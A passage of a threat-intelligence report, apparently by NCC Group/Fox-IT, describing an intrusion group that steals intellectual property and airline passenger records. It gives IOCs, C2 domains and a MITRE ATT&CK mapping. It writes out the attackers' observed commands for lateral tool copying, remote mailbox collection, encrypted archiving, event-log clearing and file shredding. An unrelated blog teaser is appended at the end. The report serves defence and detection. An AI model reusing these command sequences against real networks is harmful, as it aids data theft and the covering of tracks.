But first: How did they get the tools on the victim’s systems? The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools. A few examples of commands we observed:

copy get.exe \\<ip>\c$\windows\temp\
copy msadc* \\<hostname>\c$\Progra~1\Common~1\System\msadc\
copy update.exe \\<ip>\c$\windows\temp\
move ak002.bat \\<ip>\c$\windows\temp\update.bat

Collection (TA0009)

In preparation of exfiltration of the data needed for their objective, the adversary collected the data from various sources within the victim’s network. As described before, the adversary collected data from an information repository, Microsoft SharePoint Online in this case. This document was exfiltrated and used to continue the intrusion via a company portal and VPN.

In all cases we’ve seen the adversary copying results of the discovery phase, like file- and directory lists from local systems, network shared drives, and file shares on remote systems. But email collection is also important for this adversary: with every intrusion we saw the mailbox of some users being copied, from both local and remote systems:

wmic /node:<ip> process call create "cmd /c copy c:\Users\<username>\<path>\backup.pst c:\windows\temp\backup.pst"
copy "i:\<path>\<username>\My Documents\<filename>.pst"
copy \\<hostname>\c$\Users\<username>\AppData\Local\Microsoft\Outlook*.ost

Files and folders of interest are collected as well and staged for exfiltration.

The goal of targeting some victims appears to be to obtain Passenger Name Records (PNR). How this PNR data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve PNR data from memory of systems where such data is typically processed, such as flight booking servers.

The DLL’s used were side-loaded in memory on compromised systems. After placing the DLL in the appropriate directory, the actor would change the date and time stamps on the DLL files to blend in with the other legitimate files in the directory.

Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic.

We’ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line. The filename of the command-line executable for WinRAR is RAR.exe by default.

This activity group always uses a renamed version of rar.exe. We have observed the following filenames overlapping all intrusions:

  • jucheck.exe
  • RecordedTV.ms
  • teredo.tmp
  • update.exe
  • msadcs1.exe

The adversary typically places the executables in the following folders:

  • C:\Users\Public\Libraries\
  • C:\Users\Public\Videos\
  • C:\Windows\Temp\

The following four different variants of the use of rar.exe as update.exe we have observed:

update a -m5 -hp<password> <target_filename> <source>
update a -m5 -r -hp<password> <target_filename> <source>
update a -m5 -inul -hp<password> <target_filename> <source>
update a -m5 -r -inul -hp<password> <target_filename> <source>

The command lines parameters have the following effect:

  • a = add to archive.
  • m5 = use compression level 5.
  • r = recurse subfolders.
  • inul = suppress error messages.
  • hp<password> = encrypt both file data and headers with password.

The used password, file extensions for the staged data differ per intrusion. We’ve seen the use of .css, .rar, .log.txt, and no extension for staged pieces of data.

After compromising a host with a Linux operating systems, data is also compressed. This time the adversary compresses the data as a gzipped tar-file: tar.gz. Sometimes no file extension is used, or the file extension is .il. Most of the times the files names are prepended with adsDL_ or contain the word “list”. The files are staged in the home folder of the compromised user account: /home/<username>/

Command and control (TA0011)

The adversary uses Cobalt Strike as framework to manage their compromised systems. We observed the use of Cobalt Strike’s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is they made use of a cracked/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike’s trial version are limited. More importantly: the trial version doesn’t support encryption of command and control traffic in cases where the protocol itself isn’t encrypted, such as DNS. In one intrusion we investigated, the victim had years of logging available of outgoing DNS-requests. The DNS-responses weren’t logged. This means that only the DNS C2 leaving the victim’s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity. With all this activity data, it was possible for us to create some insight into the ‘office’-hours of this adversary. The activity took place six days a week, rarely on Sundays. The activity started on average at 02:36 UTC and ended rarely after 13:00 UTC. We observed some periods where we expected activity of the adversary, but almost none was observed. These periods match with the Chinese Golden Week holiday.

Figure 2: Heatmap of activity. Times on the X-axis are in UTC.

The adversary also changed their domains for command & control around the same time they switched C2 protocols. They used a subdomain under a regular parent domain with a .com TLD in 2017 and 2018, but they started using sub-domains under the parent domain appspot.com and azureedge.net in 2019. The parent domain appspot.com is a domain owned by Google, and part of Google’s App Engine platform as a service. Azureedge.net is a parent domain owned by Microsoft, and part of Microsoft’s Azure content delivery network.

Exfiltration (TA0010)

The adversary uses the command and control channel to exfiltrate small amounts of data. This is usually information containing account details. For large amounts of data, such as the mailboxes and network shares with intellectual property, they use something else.

Once the larger chunks of data are compressed, encrypted, and staged, the data is exfiltrated using a custom built tool. This tool exfiltrates specified files to cloud storage web services. The following cloud storage web services are supported by the malware:

  • Dropbox
  • Google Drive
  • OneDrive

The actor specifies the following arguments when running the exfiltration tool:

  • Name of the web service to be used
  • Parameters used for the web service, such as a client ID and/or API key
  • Path of the file to read and exfiltrate to the web service

We have observed the exfiltration tool in the following locations:

  • C:\Windows\Temp\msadcs.exe
  • C:\Windows\Temp\OneDrive.exe

Hashes of these files are listed at the end of this article.

Defense evasion (TA0005)

The adversary attempts to clean-up some of the traces from their intrusions. While we don’t know what was deleted and we were unable to recover, we did see some of their anti-forensics activity:

  • Windows event logs clearing,
  • File deletion,
  • Timestomping

An overview of the observed commands can be found in the appendix.

For indicator removal on host: Timestomp the adversary uses a Windows version of the Linux touch command. This tool is included in the UnxUtils repository. This makes sure the used tools by the adversary blend in with the other files in the directory when shown in a timeline. Creating a timeline is a common thing to do for forensic analysts to get a chronological view of events on a system.

The same activity group?

A number of our intrusions involved tips from an industry partner who was able to correlate some of their upstream activity.

Our threat intelligence analysts observed clear overlap between the various cases that NCC Group and Fox-IT worked in the threat’s infrastructure and capabilities, and as a result we assess with moderate confidence one activity group was carrying out the intrusions across the different type of victims.

Some overlap is very generic for a lot for a lot of groups, like the use of Cobalt Strike, or exfiltration to OneDrive. But the tool used for exfiltration to OneDrive is very specific for this adversary. The use of appspot and azureedge domains as well. The naming convention for their subdomains, tools and scripts overlap too. In summary:

The adversary: Working hours match with GMT+8.

Infrastructure: appspot.com and azureedge.net for C2 with a strong overlap in naming convention for subdomains and actual overlap in some subdomains between intrusions.

Capability: Password spraying/credential stuffing. Cobalt Strike. Copy NTDS.dit. Use scheduled tasks and batch files for automation. The use of LOLBins. WinRAR. Cloud exfil tool and exfil to OneDrive. Erasing Windows Event Logs, files and tasks. Overlap in filenames for tools, staged data, and folders.

Victim: Semiconductors and aviation industry.

We considered labelling them as two activity groups, as of the difference in victims between various intrusions. But all the other overlap is strong enough for us to consider it as one group right now. This group might have gotten a new customer interested in different data which changed the intent and victims of the adversary.

But most importantly: The largest overlap is in the top half of the pyramid of pain: domain names, host artifacts, tools, and TTPs. And these are the hardest for the adversary to change, and most effective for long-lasting detection!

Figure 3: Pyramid of pain by David J Bianco

Fox-IT and NCC Group found some very strong overlap between what we’ve seen in our intrusion, and what Cycraft describes in their APT Group Chimera report and Blackhat presentation. The bulk of the victims they describe are in different regions than we observed which is likely caused by field of view bias. SentinelOne also describes an attack and shares IOC’s that show strong overlap with the intrusions we investigated.

Conclusion

At this moment we believe based on the evidence observed that the various intrusions were performed by the same group. We can only report what we observed: first they stole intellectual property in the high tech sector, later they stole passenger name records (PNR) from airlines, both across geographical locations. Both types of stolen data are very useful for nation states.

Answering if this group has an advanced persistent threat (APT) technique, has some sort of state affiliation, or where they come from goes beyond the scope of this write-up. The threat intelligence and IOC’s we are sharing are intended to help discover and present intrusions by this and adversaries.

A word of thanks goes out to all the forensic experts, incident responders, and threat intelligence analysts who helped victims identifying and eradicating the adversary. And everybody from NCC Group and Fox-IT (part of NCC Group) for all the contributions to this article.

IOC

Type Data Observed Note
Binary MD5 133a159e86ff48c59e79e67a3b740c1e get.exe (GetHttpsInfo)
Binary MD5 328ba584bd06c3083e3a66cb47779eac psloglist.exe
Binary MD5 65cf35ddcb42c6ff5dc56d6259cc05f3 update.exe (WinRAR)
Binary MD5 4d5440282b69453f4eb6232a1689dd4a msadcs.exe (Cloud exfil tool)
Binary MD5 90508ff4d2fc7bc968636c716d84e6b4 msadcs.exe (Cloud exfil tool)
Binary MD5 c9b8cab697f23e6ee9b1096e312e8573 jucheck.exe (WinRAR)
Binary MD5 dd138a8bc1d4254fed9638989da38ab1 msadcs.exe (NTDSAudit)
C2 domain EuDbSyncUp[.]com Q4 2017 – Q4 0218
C2 domain UsMobileSos[.]com Q4 2017 – Q4 2018
C2 domain officeeuupdate.appspot[.]com Q4 2017 – Q4 2018
C2 domain MsCupDb[.]com Q4 2017 – Q4 2018
C2 domain officeeuropupd.appspot[.]com Q3 2019 – Q1 2020
C2 domain platform-appses.appspot[.]com Q4 2019 – Q1 2020
C2 domain watson-telemetry.azureedge[.]net Q4 2019 – Q1 2020
C2 domain europe-s03213.appspot[.]com 2019
C2 domain eustylejssync.appspot[.]com  2019
C2 domain fsdafdsfdsaflkjkxvzcuifsad.azureedge[.]net 2019
C2 domain ictsyncserver.appspot[.]com 2019
C2 domain sowfksiw38f2aflwfif.azureedge[.]net  2019
Filename fs_action*.bat Task automation
Filename fs_action*.ps1 Task automation
Filename update.bat Task automation
Filename update*.bat Task automation
Filename *dsinternals*.dll  Dsinternals lib files 
Filename get.exe GetHttpsInfo
Filename adsDL_<dir>.log Staging data
Filename group_membership.csv SharpHound output
Filename local_admins.csv SharpHound output
Filename msadcs.exe Various tools
Filename msadcs1.exe WinRAR
Filename OneDrive.exe Cloud data exfil
Filename sessions.csv SharpHound output
Filename RecordedTV.ms WinRAR
Filename RecordedTV_*.csv Staging data
Filename RecordedTV_*.ms Staging data
Filename RecordedTV_*.rar Staging data
Filename RecordedTV_*.txt Staging data
Filename teredo.tmp WinRAR
Filename update.exe WinRAR
Filename hsperfdata.sqm Archive with tools
Filename update*.log Staging data
Hostname DESKTOP-0FVJ37C Origin of login to Exchange
IPv4 address 47.75.0[.]147 Q2 2019 Password spray
IPv4 address 59.47.4[.]27 Q2 2019 ADFS login
IPv4 address 45.9.248[.]74 Q2 2019 Citrix login
IPv4 address 172.111.210[.]53 Q2 2019 Citrix login
IPv4 address 103.51.145[.]123  2019 Initial access 
IPv4 address 119.39.248[.]32  2019 Initial access
IPv4 address 120.227.35[.]98  2019 Initial access
IPv4 address 14.229.140[.]66  2019 Mount the file-share 
IPv4 address 172.111.210[.]53  2019 Initial access
IPv4 address 188.72.99[.]41  2019 Initial access
IPv4 address 45.9.248[.]74  2019 Initial access
IPv4 address 47.75.0[.]147  2019 Password spray
IPv4 address 5.254.112[.]226  2019 Initial access
IPv4 address 5.254.64[.]234  2019 Initial access
IPv4 address 59.47.4[.]27  2019 Initial access
IPv4 address 39.109.5[.]135 Q3 2017 VPN server login
IPv4 address 43.250.200[.]106 Q3 2017 VPN server login
IPv4 address 119.39.248[.]101 Q3 2017 VPN server login
IPv4 address 220.202.152[.]47 Q3 2017 VPN server login
IPv4 address 119.39.248[.]20 Q3 2017 VPN server login
IPv4 address 185.170.210[.]84 Q3 2017 VPN server login
IPv4 address 43.250.201[.]71 Q3 2017 VPN server login
IPv4 address 23.236.77[.]94 Q3 2017 ADFS login
Path C:\Code\NtdsAudit\src\NtdsAudit\obj\Release\ NTDSAudit artifacts
Path C:\Users\Public\Appdata\Local\ Staging and tools
Path C:\Users\Public\Appdata\Local\Microsoft\Windows\INetCache Staging and tools
Path C:\Users\Public\Libraries\ Staging and tools
Path C:\Users\Public\Videos\ Staging and tools
Path C:\Windows\Temp\ Staging and tools
Path C:\Windows\Temp\tmp Staging and tools
URI in CS beacon /externalscripts/jquery/jquery-3.3.1.min.js  Q3 2019 – Q1 2020
URI in CS beacon /externalscripts/jquery/jquery-3.3.2.min.js Q2 2019 – Q3 2019
URI in CS beacon /jquery-3.3.2.slim.min.js Q1 2020
User-agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Web VPN login
User-agent Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Cobalt Strike beacon

Observed discovery commands

Technique Command
Account discovery net user
Account discovery net user Administrator
Account discovery net user /domain
Account discovery dir \\<hostname>\c$\users
Account discovery dsquery user -limit 0 -s <hostname>
Account discovery psloglist.exe -accepteula -x security -s -a <current_date>
Account discovery msadcs.exe  “NTDS.dit” -s “SYSTEM” -p RecordedTV_pdmp.txt –users-csv RecordedTV_users.csv
Browser bookmark discovery type \\<hostname>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Domain trust discovery nltest /domain_trusts
File and directory discovery dir \\<hostname>\c$\
File and directory discovery dir /o:d /x /s c:\
File and directory discovery dir /o:d /x \\<hostname>\<fileshare>
File and directory discovery cacl <path to file>
Network service scanning get -b <start ip> -e <end ip> -p
Network service scanning get -b <start ip> -e <end ip>
Network share discovery net share
Network share discovery net view \\<hostname>
Permission groups discovery net localgroup administrators
Process discovery tasklist /v |findstr explorer
Process discovery tasklist /v |findstr taskhost
Process discovery tasklist /v |findstr 1716
Process discovery tasklist /v /s <hostname/ip>
Query registry reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Query registry reg query \\<host>\HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Remote system discovery type \\<host>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Remote system discovery type \\<host>\<path>\Cookies\*ctx*
Remote system discovery reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Remote system discovery dir /o:d /x \\<hostname>\c$\users\<username>\Favorites
Remote system discovery net view \\hostname
Remote system discovery dsquery server -limit 0
System information discovery fsutil fsinfo drives
System information discovery systeminfo
System information discovery vssadmin list shadows
System network configuration discovery ipconfig
System network configuration discovery ipconfig /all
System network configuration discovery ping -n 1 -a <ip>
System network configuration discovery ping -n 1 <hostname>
System network configuration discovery tracert <ip>
System network configuration discovery pathping <ip>
System network connections discovery netstat -ano | findstr EST
System Owner/User Discovery quser
System service discovery net start
System service discovery net use
System time discovery time /t
System time discovery net time \\<ip/hostname>

Observed Defense evasion commands


Indicator Removal on Host: Clear Windows Event Logs

wevtutil cl "Windows PowerShell"
wevtutil cl application
wevtutil cl security
wevtutil cl setup
wevtutil cl system

Indicator Removal on Host: File Deletion

del /f/q *.csv *.bin
del /f/q *.exe
del /f/q *.exe *log.txt
del /f/q *.ost
del /f/q .rar update .txt
del /f/q \\c$\windows\temp*.txt
del /f/q \\c$\Progra~1\Common~1\System\msadc\msadcs.dmp
del /f/q msadcs*
del /f/q psloglist.exe
del /f/q update*
del /f/q update* .txt del /f/q update.rar
del /f/q update*rar
del /f/q update12321312.rarschtasks /delete /s /tn "update" /f

schtasks /delete /tn "update" /f

shred -n 123 -z -u .tar.gz

MITRE ATT&CK references

Name Type ID More info
Initial Access Tactic TA0001 https://attack.mitre.org/tactics/TA0001/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Execution Tactic TA0002 https://attack.mitre.org/tactics/TA0002/
Command and Scripting Interpreter: PowerShell Technique T1059.001 https://attack.mitre.org/techniques/T1059/001/
Command and Scripting Interpreter: Windows Command Shell Technique T1059.003 https://attack.mitre.org/techniques/T1059/003/
Scheduled Task/Job: Scheduled Task Technique T1053.005 https://attack.mitre.org/techniques/T1053/005/
System Services: Service Execution Technique T1569.002 https://attack.mitre.org/techniques/T1569/002/
Windows Management Instrumentation Technique T1047 https://attack.mitre.org/techniques/T1047/
Persistence Tactic TA0003 https://attack.mitre.org/tactics/TA0003/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Privilege Escalation Tactic TA0004 https://attack.mitre.org/tactics/TA0004/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Defense Evasion Tactic TA0005 https://attack.mitre.org/tactics/TA0005/
Deobfuscate/Decode Files or Information Technique T1140 https://attack.mitre.org/techniques/T1140/
Indicator Removal on Host: Clear Windows Event Logs Technique T1070.001 https://attack.mitre.org/techniques/T1070/001/
Indicator Removal on Host: File Deletion Technique T1070.004 https://attack.mitre.org/techniques/T1070/004/
Indicator Removal on Host: Timestomp Technique T1070.006 https://attack.mitre.org/techniques/T1070/006/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Masquerading: Rename System Utilities Technique T1036.003 https://attack.mitre.org/techniques/T1036/003/
Masquerading: Match Legitimate Name or Location Technique T1036.005 https://attack.mitre.org/techniques/T1036/005/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Credential Access Tactic TA0006 https://attack.mitre.org/tactics/TA0006/
Brute Force: Password Spraying Technique T1110.003 https://attack.mitre.org/techniques/T1110/003/
Brute Force: Credential Stuffing Technique T1110.004 https://attack.mitre.org/techniques/T1110/004/
OS Credential Dumping: LSASS Memory Technique T1003.001 https://attack.mitre.org/techniques/T1003/001/
OS Credential Dumping: NTDS Technique T1003.003 https://attack.mitre.org/techniques/T1003/003/
Two-Factor Authentication Interception Technique T1111 https://attack.mitre.org/techniques/T1111/
Discovery Tactic TA0007 https://attack.mitre.org/tactics/TA0007/
Account Discovery Technique T1087  
Account Discovery: Local Account Technique T1087.001 https://attack.mitre.org/techniques/T1087/001/
Account Discovery: Domain Account Technique T1087.002 https://attack.mitre.org/techniques/T1087/002/
Browser Bookmark Discovery Technique T1217 https://attack.mitre.org/techniques/T1217/
Domain Trust Discovery Technique T1482 https://attack.mitre.org/techniques/T1482/
File and Directory Discovery Technique T1083 https://attack.mitre.org/techniques/T1083
Network Service Scanning Technique T1046 https://attack.mitre.org/techniques/T1046
Network Share Discovery Technique T1135 https://attack.mitre.org/techniques/T1135
Permission Groups Discovery Technique T1069 https://attack.mitre.org/techniques/T1069
Process Discovery Technique T1057 https://attack.mitre.org/techniques/T1057
Query Registry Technique T1012 https://attack.mitre.org/techniques/T1012
Remote System Discovery Technique T1018 https://attack.mitre.org/techniques/T1018
System Information Discovery Technique T1082 https://attack.mitre.org/techniques/T1082
System Network Configuration Discovery Technique T1016 https://attack.mitre.org/techniques/T1016
System Network Connections Discovery Technique T1049 https://attack.mitre.org/techniques/T1049
System Owner/User Discovery Technique T1033 https://attack.mitre.org/techniques/T1033
System Service Discovery Technique T1007 https://attack.mitre.org/techniques/T1007
System Time Discovery Technique T1124 https://attack.mitre.org/techniques/T1124
Lateral Movement Tactic TA0008 https://attack.mitre.org/tactics/TA0008/
Lateral Tool Transfer Technique T1570 https://attack.mitre.org/techniques/T1570/
Remote Services: SMB/Windows Admin Shares Technique T1021.002 https://attack.mitre.org/techniques/T1021/002/
Remote Services: SSH Technique T1021.004 https://attack.mitre.org/techniques/T1021/004/
Remote Services: Windows Remote Management Technique T1021.006 https://attack.mitre.org/techniques/T1021/006/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Collection Tactic TA0009 https://attack.mitre.org/tactics/TA0009/
Archive Collected Data: Archive via Utility Technique T1560.001 https://attack.mitre.org/techniques/T1560/001/
Automated Collection Technique T1119 https://attack.mitre.org/techniques/T1119/
Data from Information Repositories: SharePoint Technique T1213.002 https://attack.mitre.org/techniques/T1213/002/
Data from Local System Technique T1005 https://attack.mitre.org/techniques/T1005/
Data from Network Shared Drive Technique T1039 https://attack.mitre.org/techniques/T1039/
Data Staged: Local Data Staging Technique T1074.001 https://attack.mitre.org/techniques/T1074/001/
Data Staged: Remote Data Staging Technique T1074.002 https://attack.mitre.org/techniques/T1074/002/
Email Collection: Local Email Collection Technique T1114.001 https://attack.mitre.org/techniques/T1114/001/
Command and Control Tactic TA0011 https://attack.mitre.org/tactics/TA0011/
Application Layer Protocol: Web Protocols Technique T1071.001 https://attack.mitre.org/techniques/T1071/001/
Application Layer Protocol: DNS Technique T1071.004 https://attack.mitre.org/techniques/T1071/004/
Encrypted Channel: Asymmetric Cryptography Technique T1573.002 https://attack.mitre.org/techniques/T1573/002/
Protocol Tunneling Technique T1572 https://attack.mitre.org/techniques/T1572/
Exfiltration Tactic TA0010 https://attack.mitre.org/tactics/TA0010/
Automated Exfiltration Technique T1020 https://attack.mitre.org/techniques/T1020/
Data Transfer Size Limits Technique T1030 https://attack.mitre.org/techniques/T1030/
Exfiltration Over C2 Channel Technique T1041 https://attack.mitre.org/techniques/T1041/
Exfiltration Over Web Service: Exfiltration to Cloud Storage Technique T1567.002 https://attack.mitre.org/techniques/T1567/002/

Announcing ECG v2.0

By: voidsec
11 January 2021 at 13:39

We are proud to announce that ECG got its first major update. ECG: is the first and single commercial solution (Static Source Code Scanner) able to analyze & detect real and complex security vulnerabilities in TCL/ADP source-code. ECG’s v2.0 New Features On-Premises Deploy: Scan your code repository on your secure and highly-scalable offline appliance with a local […]

The post Announcing ECG v2.0 appeared first on VoidSec.

❌
❌